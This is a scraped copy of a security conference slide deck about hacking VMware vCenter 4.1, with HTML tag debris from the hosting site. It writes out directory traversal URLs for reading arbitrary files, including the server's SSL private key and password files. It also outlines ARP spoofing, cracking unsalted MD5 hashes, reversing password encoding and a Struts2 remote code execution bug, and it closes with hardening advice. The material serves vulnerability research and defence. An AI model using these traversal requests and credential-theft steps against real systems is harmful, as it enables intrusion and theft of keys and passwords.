How to hack VMware vCenter server in 60 seconds - ERPScan
17.06.2015 Views
Share Embed Flag

How to hack VMware vCenter server in 60 seconds - ERPScan

How to hack VMware vCenter server in 60 seconds - ERPScan

How to hack VMware vCenter server in 60 seconds - ERPScan

SHOW MORE
SHOW LESS
ePAPER READ
DOWNLOAD ePAPER
erpscan.com

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

START NOW

Invest <strong>in</strong> security<br />

<strong>to</strong> secure <strong>in</strong>vestments<br />

<strong>How</strong> <strong>to</strong> <strong>hack</strong> <strong>VMware</strong><br />

<strong>vCenter</strong> <strong>server</strong> <strong>in</strong> <strong>60</strong><br />

<strong>seconds</strong><br />

Alexander M<strong>in</strong>ozhenko

#whoami<br />

• Pen-tester at <strong>ERPScan</strong><br />

• Researcher<br />

• DCG#7812 / ZeroNights<br />

• CTF<br />

• Thanks for ideas and support <strong>to</strong> Alexey S<strong>in</strong>tsov<br />

2

Target<br />

3

<strong>VMware</strong> <strong>vCenter</strong> Server<br />

• <strong>VMware</strong> <strong>vCenter</strong> Server is a solution <strong>to</strong> manage<br />

<strong>VMware</strong> vSphere<br />

• vSphere – virtualization operat<strong>in</strong>g system<br />

4

Target<br />

• <strong>VMware</strong> <strong>vCenter</strong> version 4.1 update 1<br />

• Services:<br />

– Update Manager<br />

– <strong>vCenter</strong> Orchestra<strong>to</strong>r<br />

– Chargeback<br />

– Other<br />

• Each service has a web <strong>server</strong><br />

5

CVE-2009-1523<br />

• Direc<strong>to</strong>ry traversal <strong>in</strong> Jetty web <strong>server</strong><br />

• http://target:9084/vci/download/health.xml/%3f/../../../../FILE<br />

• Discovered by Claudio Criscione<br />

• But fixed <strong>in</strong> <strong>VMware</strong> Update Manager 4.1 update 1 :(<br />

• Who wants <strong>to</strong> pay me for 0-days?<br />

• A pen-tester is not a researcher?<br />

6

Direc<strong>to</strong>ry traversal… aga<strong>in</strong>?<br />

• Direc<strong>to</strong>ry traversal <strong>in</strong> Jetty web <strong>server</strong><br />

• http://target:9084/vci/download/.%5C..%5C..%5C..%5C..%5C..%<br />

5C..%5C..%5C..\FILE.EXT<br />

• Discovered by Alexey S<strong>in</strong>tsov<br />

• Metasploit module vmware_update_manager_traversal.rb by<br />

s<strong>in</strong>n3r<br />

7

Direc<strong>to</strong>ry traversal<br />

• We can read any file! But what file <strong>to</strong> read?<br />

• Claudio Criscione proposed <strong>to</strong> read vpxd-profiler-* -<br />

/SessionStats/SessionPool/Session/Id='06B90BCB-A0A4-4B9C-B680-<br />

FB72656A1DCB'/Username=„FakeDoma<strong>in</strong>\FakeUser'/SoapSession/Id='A<br />

D45B176-63F3-4421-BBF0-FE1<strong>60</strong>3E543F4'/Count/<strong>to</strong>tal 1<br />

• Conta<strong>in</strong>s logs of SOAP requests with session ID<br />

• VASTO http://vas<strong>to</strong>.nibblesec.org/<br />

Sorry, patched <strong>in</strong> 4.1!<br />

8

Fixed?<br />

• Fixed <strong>in</strong> version 4.1 update 1<br />

• Conta<strong>in</strong>s IP addresses<br />

9

Attack<br />

• Make an ARP poison<strong>in</strong>g attack<br />

• Spoof the SSL certificate<br />

10

Attack<br />

• Adm<strong>in</strong>istra<strong>to</strong>rs check the SSL cert<br />

11

Attack<br />

• Steal SSL key via direc<strong>to</strong>ry traversal<br />

http://target:9084/vci/downloads/.\..\..\..\..\..\..\..\Documents and Sett<strong>in</strong>gs\All<br />

Users\Application Data\<strong>VMware</strong>\<strong>VMware</strong> VirtualCenter\SSL\rui.key<br />

• Make ARP spoof<strong>in</strong>g<br />

• Decrypt traffic with the s<strong>to</strong>len SSL key<br />

• What if ARP spoof<strong>in</strong>g does not work?<br />

12

<strong>VMware</strong> <strong>vCenter</strong> Orchestra<strong>to</strong>r<br />

• <strong>VMware</strong> vCO – software for au<strong>to</strong>matic<br />

configuration and management<br />

• Installed by default with <strong>vCenter</strong><br />

• Has an <strong>in</strong>terest<strong>in</strong>g file:<br />

C:\Program files\<strong>VMware</strong>\Infrastructure\Orchestra<strong>to</strong>r<br />

\configuration\jetty\etc\passwd.properties<br />

13

<strong>VMware</strong> <strong>vCenter</strong> Orchestra<strong>to</strong>r<br />

• Which conta<strong>in</strong>s md5 passwords without salt<br />

• Can easily bruteforce us<strong>in</strong>g ra<strong>in</strong>bow tables<br />

14

We get <strong>in</strong><br />

15

Pla<strong>in</strong> text passwords<br />

16

<strong>VMware</strong> <strong>vCenter</strong> Orchestra<strong>to</strong>r<br />

• vCO s<strong>to</strong>red password <strong>in</strong> the follow<strong>in</strong>g files:<br />

• C:\Program<br />

Files\<strong>VMware</strong>\Infrastructure\Orchestra<strong>to</strong>r\app<strong>server</strong>\<strong>server</strong>\vmo\conf\plug<strong>in</strong>s\VC.xml<br />

• C:\Program<br />

Files\<strong>VMware</strong>\Infrastructure\Orchestra<strong>to</strong>r\app<strong>server</strong>\<strong>server</strong>\vmo\conf\vmo.properties<br />

17

VC.xml<br />

<br />

<br />

Password encod<strong>in</strong>g<br />

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f<strong>60</strong>654b<br />

vmware<br />

00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e2472<strong>60</strong>79<br />

vcenter<br />

• Red bytes look like length<br />

• Green bytes are <strong>in</strong> ASCII range<br />

• Black bytes look random<br />

19

The algorithm of password encod<strong>in</strong>g<br />

20

Password decoder<br />

21

VMSA-2011-0005<br />

• <strong>VMware</strong> <strong>vCenter</strong> Orchestra<strong>to</strong>r uses Struts2<br />

version 2.11 discovered by Digital Defense, Inc<br />

• CVE-2010-1870 Struts2/XWork remote<br />

command execution discovered by Meder<br />

Kydyraliev<br />

• Fixed <strong>in</strong> 4.2<br />

22

Example exploit<br />

23

Tool<br />

• Paleolib – a <strong>to</strong>ol which looks for old and<br />

vulnerable third party components<br />

• Get library name, vendor name, version from<br />

manifest file or resource section<br />

• Search <strong>in</strong> CVE database<br />

• http://www.github.com<br />

24

Attack vec<strong>to</strong>rs<br />

• Direc<strong>to</strong>ry traversal + ARP poison<strong>in</strong>g<br />

• Direc<strong>to</strong>ry traversal + password<br />

decod<strong>in</strong>g/bruteforc<strong>in</strong>g<br />

• Remote code execution us<strong>in</strong>g the Struts2 bug<br />

• Other bugs <strong>in</strong> <strong>VMware</strong> <strong>vCenter</strong> <strong>in</strong>frastructure<br />

products: Operation Management Suite,<br />

CapaciteIQ, Configuration Management etc.<br />

25

Harden<strong>in</strong>g<br />

• Update <strong>to</strong> latest version 4.2 update 4 or 5<br />

• Filter adm<strong>in</strong>istration services<br />

• <strong>VMware</strong> KB 2021259<br />

• <strong>VMware</strong> vSphere Security Harden<strong>in</strong>g Guide<br />

26

Conclusion<br />

• Fixed bugs are not always fixed properly<br />

• A pen-tester will get more profit if he tries <strong>to</strong><br />

research someth<strong>in</strong>g<br />

• A few simple bugs and we can own all the<br />

<strong>in</strong>frastructure<br />

27

Thank you!<br />

a.m<strong>in</strong>ozhenko@dsec.ru<br />

@al3xm<strong>in</strong><br />

28

logo

products

Resources

Company

Terms of service
Privacy policy
Cookie policy
Cookie settings
Imprint
Change language
Made with love in Switzerland
© 2024 Yumpu.com all rights reserved

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!